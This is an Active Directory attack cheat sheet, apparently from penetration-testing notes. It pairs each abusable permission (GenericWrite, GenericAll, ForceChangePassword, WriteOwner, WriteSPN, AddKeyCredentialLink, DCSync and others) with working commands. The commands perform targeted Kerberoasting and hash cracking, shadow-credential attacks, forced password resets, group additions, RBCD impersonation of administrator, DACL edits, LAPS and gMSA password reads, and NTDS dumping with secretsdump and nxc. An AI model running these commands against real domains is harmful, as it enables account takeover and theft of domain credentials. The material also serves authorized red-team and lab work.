GenericWrite on User
Update object’s attributes
Targeted Kerberoasting
1
| targetedKerberoast.py -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user
|
1
| hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force
|
1
| john <hash_file> --wordlist=rockyou.txt
|
ShadowCredentials
1
| certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip
|
Using Kerberos
1
| certipy shadow auto -username username@domain -k -account target_user -dc-ip ip
|
GenericALL
Full rights to the object (add users to a group or reset user’s password)
Change Password
1
| bloodyAD --host dc -d domain -u username -p password set password target new_password
|
1
| net rpc password 'username' 'new_password' -U 'domain'/'username'%'hash' -S 'dc' --pw-nt-hash
|
1
| net rpc password 'username' 'new_password' -U 'domain'/'username'%'password' -S 'dc'
|
Add user to a group
1
| net rpc group addmem target_group username -U domain/username -S dc
|
1
| bloodyAD --host dc -d domain -u username -p password add groupMember target_group target_username
|
RBCD
1
| rbcd.py -delegate-from machine_name -delegate-to target -dc-ip ip -action write 'domain/username:password'
|
1
| getST.py -spn 'cifs/dc' -impersonate administrator -dc-ip ip 'domain/machine_name:password
|
1
| export KRB5CCNAME=administrator.ccache
|
GenericALL on OU
1
| dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal username -target-dn 'OU_DN' domain/username:password
|
ForceChangePassword
Ability to change user’s password
1
| net rpc password <TargetUser> <new_password> -U "DOMAIN"/"ControlledUser"%"Password" -S <DomainController>
|
1
| bloodyAD --host ip -d dc -u username -p password set password target_userename new_password
|
1
| python rpcchangepwd.py <domain>/<username>:<password>@<ip> -newpass <new_password>
|
1
| nxc smb domain -u username -p password -M change-password -o USER='target_username' NEWPASS='new_password'
|
AddMember
1
| net rpc group addmem target_group username -U domain/username -S dc
|
1
| bloodyAD.py --host dc -d domain -u username -p password add groupMember target_group user_to_add
|
AddSelf
The user has the ability to add itself to the target group
1
| bloodyAD.py --host dc -d domain -u username -p password add groupMember target_group username
|
WriteOwner
Change object owner to attacker controlled user take over the object
1
| owneredit.py -action write -new-owner username -target target domain/username:password
|
1
| dacledit.py -action 'write' -rights 'FullControl' -principal username -target-dn dn 'domain/username:password'
|
or
1
| dacledit.py -action 'write' -rights 'WriteMembers' -principal username -target-dn dn 'domain/username:password'
|
1
| bloodyAD.py --host dc -d domain -u username -p password add groupMember target_group username
|
WriteSPN
The ability to write to the “serviceprincipalname” attribute to the target user
1
| bloodyAD --host dc -d domain -u username -p password set object target servicePrincipalName -v 'domain/meow'
|
1
| GetUserSPNs.py domain/username:password -dc-ip ip -request
|
or
1
| targetedKerberoast.py -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user
|
AddKeyCredentialLink
1
| pywhisker.py -d domain --dc-ip ip -u username -p password --target target --action add
|
1
| gettgtpkinit.py -cert-pfx file.pfx -pfx-pass pfx_password domain/target ticket.ccache -dc-ip ip
|
1
| getnthash.py domain/target -k key -dc-ip ip
|
or
1
| certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip
|
ReadLAPSPassword
1
| nxc smb target -u username -p password --laps
|
ReadGMSAPassword
1
| nxc ldap target -u username -p password --gmsa
|
DCSync
A user or a computer has the DS-Replication-Get-Changes and the DS-Replication-Get-Changes-All permission on the domain
1
| secretsdump.py domain/username:password@domain
|
1
| secretsdump.py domain/username@domain -hashes :hash
|
1
| nxc smb target -u username -p password --ntds
|
1
| nxc smb target --use-kcache --ntds
|
Resources
